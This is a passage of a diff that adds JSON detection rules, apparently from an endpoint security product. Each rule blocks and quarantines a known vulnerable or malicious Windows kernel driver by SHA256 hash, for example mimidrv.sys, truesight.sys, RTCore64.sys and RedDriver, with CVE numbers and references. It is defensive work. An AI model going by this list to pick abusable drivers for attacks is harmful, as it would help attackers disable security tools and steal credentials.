"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e99580e25f419b5ad90669e0c274cf63d30efa08065d064a863e655bdf77fb59", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fc68786-6956-5406-938b-eb255074a7e2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464571Z", + "creation_date": "2026-03-23T11:45:30.464574Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464582Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d41e39215c2c1286e4cd3b1dc0948adefb161f22bc3a78756a027d41614ee4ff", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fe26f27-6596-5e84-bd9c-1dc373053acc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", 
+ "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.827272Z", + "creation_date": "2026-03-23T11:45:30.827275Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.827280Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93961c2756dc824d1d11867c294445cc18ac611082536bbe5112c7e8827da329", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fe2ff09-7355-57e3-8c58-c4944d696fa4", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.607961Z", + "creation_date": "2026-03-23T11:45:29.607963Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.607969Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ff8d17761c1645bdd1f0eccc69024907bbbfbe5c60679402b7d02f95b16310fe", + "comment": "Micro-Star MSI Afterburner vulnerable 
driver (aka RTCore32.sys and RTCore64.sys) [CVE-2019-16098] [https://www.loldrivers.io/drivers/275c80c5-a67c-4536-b29e-4e481242cb01/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fe63fa7-402d-50cd-b30c-384873b9c53e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.464883Z", + "creation_date": "2026-03-23T11:45:30.464887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.464896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0d676baac43d9e2d05b577d5e0c516fba250391ab0cb11232a4b17fd97a51e35", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fec57bd-0b69-5721-b703-bdbdf7a78ddf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614857Z", + "creation_date": 
"2026-03-23T11:45:29.614858Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614864Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "cc586254e9e89e88334adee44e332166119307e79c2f18f6c2ab90ce8ba7fc9b", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6fecbb49-a0a4-5955-b328-2e663b1235a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.986031Z", + "creation_date": "2026-03-23T11:45:29.986033Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.986039Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c9fbff8b749a1f580b5b5b9e59ec3ffd769b4179970b82e32a3d36e7a3a8cb1a", + "comment": "Malicious Kernel Driver related to RedDriver (aka telephonuAfY.sys, spwizimgVT.sys, 834761775.sys, reddriver.sys, typelibdE.sys, NlsLexicons0024UvN.sys and ktmutil7ODM.sys) [https://blog.talosintelligence.com/undocumented-reddriver/] [authentihash SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6ff8a788-0f4b-519f-91ef-b1218ef5d3d1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.615380Z", + "creation_date": "2026-03-23T11:45:29.615382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.615387Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "809403706c3669a0d67bd35a87f66714989d1bc66e2aa6ca5979781ae3c4fdb0", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7008cc84-d4e2-59ec-99b2-f4085821cad1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485936Z", + "creation_date": "2026-03-23T11:45:31.485940Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": 
true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485960Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a3e4562b565b106fe859f06622c2674f44ef5bb41c5144583285a408d0870e51", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "700b3063-0b49-5f4c-aafc-bb2782aa5516", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471941Z", + "creation_date": "2026-03-23T11:45:30.471969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471979Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb1183ef22ecbcc28f9c0a351c2c0280f1312a0fdf8a9983161691e2585efc70", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "700f6c07-750b-566b-b302-c5bb9de43933", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.146928Z", + "creation_date": "2026-03-23T11:45:31.146930Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.146936Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "95080c8ed5594235dbf86ab99a1f4fd22edeccecfe41241472db3975f2b7fa75", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "701e52f5-f2c5-54c6-a466-b22bfd947793", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140229Z", + "creation_date": "2026-03-23T11:45:31.140231Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140236Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "acea5013470978ce0b3d41c4204d0fdd3d5fd3f28cc3ecad11b33e01fc1bc1be", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "702608f7-0986-5a30-bdf0-432338f19434", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.812889Z", + "creation_date": "2026-03-23T11:45:31.812891Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.812896Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ec71df85d1b89a3e7f3f9bcaf793e19ed6aca96f84c99470d0684e1004bfa345", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "702d1381-28b6-5782-a591-f463c771957a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981764Z", + "creation_date": "2026-03-23T11:45:29.981766Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981771Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "15b081ec83a89182b5bb0a642d56513f40810b5b0a42e904ab6d3fa8f34c0446", + "comment": "Malicious Kernel Driver (aka daxin_blank4.sys) [https://www.loldrivers.io/drivers/f8bddc8b-49b9-41f7-a877-d15ec3f174f9/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "703850d4-8c21-5a7c-a151-07e840e86676", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488327Z", + "creation_date": "2026-03-23T11:45:31.488329Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488334Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66616748bb5b41179385a9c4d1498a0b88fa38ab41f7de83df2995795f739902", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller 
(v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "70389757-51d5-5512-9844-8954af94f750", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.141380Z", + "creation_date": "2026-03-23T11:45:31.141382Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.141388Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "441cc113a5ecaea7af80c9ed97fc8e93ea6ffc4c61b617f48ef85bb7ce94b168", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7057406b-d010-5e88-ba7d-0eb9023d6da1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.974522Z", + "creation_date": "2026-03-23T11:45:29.974524Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974530Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e37c0e580bf6f0514af985b1581fef3d66b845aeefa790c625964512a911659", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "705fe14d-0504-5ebb-81c2-4c00c96589de", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.823677Z", + "creation_date": "2026-03-23T11:45:31.823679Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.823685Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "13c3c6880f501557d1fee13215167db7afa1bc65b62f242010ad828885f8dd0f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70600820-a0f2-5286-b192-592f4049227e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499431Z",
+ "creation_date": "2026-03-23T11:45:31.499434Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499443Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8073039514143cc1863f7bd4488c7433b115f5cb1240311fb412313493143128",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "706d9f5b-4362-5eec-ad84-2a9e0095b466",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.618460Z",
+ "creation_date": "2026-03-23T11:45:29.618462Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ 
"endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.618468Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ffd1aef19646ffed09b56a2ace4fc8cdf5b2f714fcca1e7ffb82256264c94b18",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "707bbba4-e3a9-59d0-81c4-db1a37925fb1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143200Z",
+ "creation_date": "2026-03-23T11:45:31.143202Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143208Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "13f39c57ce0cee25ed6889a045bbfad1fca4de361ea8ed19e3a3af9b234b9781",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "707f98a3-10dc-5f99-8a00-460b93a596f1",
+ 
"test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615345Z",
+ "creation_date": "2026-03-23T11:45:29.615347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a6bf32fafa57bcbb84b06db0d7d28e4b1457ead69c33fa883d5abe84ecd91b51",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "708e4cad-ce8a-595d-bc1e-ad904649beaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.972038Z",
+ "creation_date": "2026-03-23T11:45:29.972040Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.972045Z",
+ 
"rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a566af57d88f37fa033e64b1d8abbd3ffdacaba260475fbbc8dab846a824eff5",
+ "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "70914d32-e1fd-5ab6-b043-fa1a9ee6e269",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983649Z",
+ "creation_date": "2026-03-23T11:45:29.983651Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983657Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09043c51719d4bf6405c9a7a292bb9bb3bcc782f639b708ddcc4eedb5e5c9ce9",
+ "comment": "Vulnerable Kernel Driver (aka amigendrv64.sys) [https://www.loldrivers.io/drivers/5c45ae9e-cb6f-4eab-a070-b0187202e080/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "7099faa7-5d88-5a2f-ab1c-411f4d0afa68",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
